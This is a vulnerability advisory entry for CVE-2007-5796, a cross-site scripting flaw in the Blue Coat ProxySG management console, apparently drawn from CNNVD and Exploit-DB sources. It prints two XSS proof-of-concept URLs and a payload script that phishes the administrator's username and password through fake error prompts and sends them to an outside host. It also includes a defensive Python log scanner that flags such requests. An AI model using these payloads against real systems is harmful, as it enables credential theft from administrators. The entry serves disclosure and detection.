Blue Coat ProxySG Management Console Cross-Site Scripting Vulnerability

Vulnerability ID: 1113863
Vulnerability type: Cross-site scripting
Published: 2007-10-29
Updated: 2007-11-15
CVE ID: CVE-2007-5796
CNNVD-ID: CNNVD-200711-035
Platform: Multiple
CVSS score: 4.3
|Vulnerability source
https://www.exploit-db.com/exploits/30729
https://www.securityfocus.com/bid/26286
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200711-035
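|Vulnerability details
A cross-site scripting vulnerability exists in the management console of Blue Coat ProxySG. A remote attacker can inject arbitrary web script or HTML by modifying the URL used to load a certificate revocation list.
|Exploit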
source: http://www.securityfocus.com/bid/26286/info

Blue Coat ProxySG Management Console is prone to two cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Versions prior to ProxySG 4.2.6.1 and 5.2.2.5 are vulnerable.

NOTE: This BID originally covered one issue, but was updated to also cover a second issue. 

https://www.example.com:8082/Secure/Local/console/install_upload_action/crl_format?name="<script>alert("XSS")</script>%00
https://www.example.com:8082/Secure/Local/console/install_upload_from_file.htm?file=<script>alert("XSS")</script><!--

Example Payload:
<script>
do {
a=prompt("Blue Coat SG400: an error has occurred\nPlease enter your USERNAME","");
b=prompt("Blue Coat SG400: an error has occurred\nPlease enter your PASSWORD","");
}while(a==null || b==null || a=="" || b=="");
alert("owned!:"+a+"/"+b);window.location="http://www.example2.com/?u="+a+"&p="+b
</script><!--
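
A defender-side check for the two requests shown above, added here as an example and not part of the original advisory: it scans access logs for requests to the two console paths whose `name` or `file` parameter decodes to markup, quotes or a NUL byte, including multiply percent-encoded values. The Apache-style log layout, the function names and the sample lines are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Console paths and parameters taken from the advisory's two example requests.
WATCHED = {
    "/Secure/Local/console/install_upload_action/crl_format": "name",
    "/Secure/Local/console/install_upload_from_file.htm": "file",
}
# Markup delimiters, quotes or a NUL byte do not belong in either parameter.
SUSPICIOUS = re.compile(r'[<>"\x00]')
# Assumed log layout: request line in double quotes, as in Apache-style logs.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Strip up to `rounds` extra layers of percent-encoding (e.g. %253C -> <)."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def flag_request(target):
    """Return (param, decoded value) for a suspicious watched request, else None."""
    parts = urlsplit(target)
    param = WATCHED.get(unquote(parts.path))
    if param is None:
        return None
    # parse_qsl removes the first encoding layer; decode_fully removes the rest.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        value = decode_fully(value)
        if key == param and SUSPICIOUS.search(value):
            return param, value
    return None

def scan(lines):
    """Return (line number, param, decoded value) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        hit = flag_request(match.group(1)) if match else None
        if hit:
            hits.append((number, *hit))
    return hits

# Constructed sample log lines (not taken from a real appliance).
SAMPLE_LOG = [
    '10.0.0.5 - admin [01/Nov/2007:10:00:00 +0000] "GET /Secure/Local/console/install_upload_action/crl_format?name=corp-root-crl HTTP/1.1" 200 512',
    '10.0.0.9 - admin [01/Nov/2007:10:02:11 +0000] "GET /Secure/Local/console/install_upload_action/crl_format?name=%22%3Cscript%3E%00 HTTP/1.1" 200 640',
    '10.0.0.9 - admin [01/Nov/2007:10:02:40 +0000] "GET /Secure/Local/console/install_upload_from_file.htm?file=%253Cscript%253E HTTP/1.1" 200 701',
    '10.0.0.7 - - [01/Nov/2007:10:03:02 +0000] "GET /index.html?file=%3Cscript%3E HTTP/1.1" 404 120',
]
```

Any hit on an unpatched appliance is worth correlating with the administrator session that issued the request, since the script runs in that user's browser.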
|Affected products
Blue Coat Systems SGOS 4.1.2
Blue Coat Systems ProxySG 0
|References

Source: VUPEN
Name: ADV-2007-3678
Link: http://www.frsirt.com/english/advisories/2007/3678
Source: www.bluecoat.com
Link: http://www.bluecoat.com/support/securityadvisories/advisory_cross-site_scripting_vulnerability
Source: SECUNIA
Name: 27452
Link: http://secunia.com/advisories/27452
Source: XF
Name: proxysg-management-console-xss(38213)
Link: http://xforce.iss.net/xforce/xfdb/38213
Source: SECTRACK
Name: 1018888
Link: http://www.securitytracker.com/id?1018888